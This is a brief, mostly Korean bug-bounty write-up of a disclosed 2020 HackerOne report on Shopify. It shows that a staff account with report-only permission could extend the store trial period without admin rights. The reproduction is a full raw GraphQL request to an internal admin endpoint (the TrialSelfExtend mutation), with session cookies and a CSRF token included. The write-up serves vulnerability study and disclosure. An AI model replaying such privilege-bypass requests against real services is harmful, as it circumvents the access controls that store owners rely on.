hackerone-shopify-2020-09-l-947728
staff can able to extend shopify trial period without admin permission
14일 무료체험이 끝나가면 무료체험을 14일 더 연장할 수 있다. 권한이 없는 직원도 admin 권한 없이 체험 기간을 연장할 수 있었다.
- 테스트를 위해 report만 가능한 직원을 추가한다.
- 다음과 같은 graphql을 스태프 계정으로 날린다.
POST /admin/internal/web/graphql/core HTTP/1.1
Host: risinghunter.myshopify.com
Connection: close
Content-Length: 218
accept: application/json
X-CSRF-Token: H9hN7Wt7-0Q1PwBhOsOIZMpEcCnp0WZQw8BM
content-type: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
X-Shopify-Web-Force-Proxy: 1
Origin: https://risinghunter.myshopify.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Cookie: new_admin=1; new_theme_editor_disabled.sig=c0lGzzh0MFBQ5fCQTfz7yqvtriw; new_theme_editor_disabled=1; _abv=0; _master_udr=eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaEpJaWxpT1dWbU4yWmtOQzFsTVdFMUxUUmlOekV0WWprMVppMW1PV1ExTm1Jd00yRXhZMllHT2daRlJnPT0iLCJleHAiOiIyMDIyLTA3LTI4VDA3OjEwOjAyLjAyOFoiLCJwdXIiOiJjb29raWUuX21hc3Rlcl91ZHIifX0%3D--aaa21a6f8ca759e8780b581506af5e6b544b851d; _secure_admin_session_id_csrf=9b14248b770db62cc190e3e264362b12; _secure_admin_session_id=9b14248b770db62cc190e3e264362b12; koa.sid=vOD0te0oCONZnKFY8VZeCFGM5sWIbwYB; koa.sid.sig=-qd5DD-YfKDTMZz7LHyxOu7MMsE; _orig_referrer=; _shopify_y=be3905ce-c786-4135-a98c-f4c292fed5bf; _y=be3905ce-c786-4135-a98c-f4c292fed5bf; _landing_page=%2Fadmin%2Fauth%2Flogin%3Faccountnumber%3D0%26from_signup%3Dtrue; __ssid=831ecb8b-307e-4640-af0a-80bfa7b89894; _y=be3905ce-c786-4135-a98c-f4c292fed5bf; _shopify_y=be3905ce-c786-4135-a98c-f4c292fed5bf; _shopify_fs=2020-07-17T04%3A36%3A57.584Z; cart_ver=%3A0; secure_customer_sig=; cart_sig=; new_theme_editor_disabled=1; _ga=GA1.2.1368468577.1594960719; _abv=0; _ab=1; storefront_digest=██████████; _secure_session_id=05214efc7671b79b95c5540b7cde58c2; __cfduid=dd29f3357820fab55e8a97634eec973941595927106
{"operationName":"TrialSelfExtend","variables":{},"query":"mutation TrialSelfExtend {\n trialSelfExtend {\n message\n userErrors {\n field\n message\n __typename\n }\n __typename\n }\n}\n"}
tags: bughunting, shopify, access control vulnerability, wstg-athz-02, wstg-athz-03, severity low, web hacking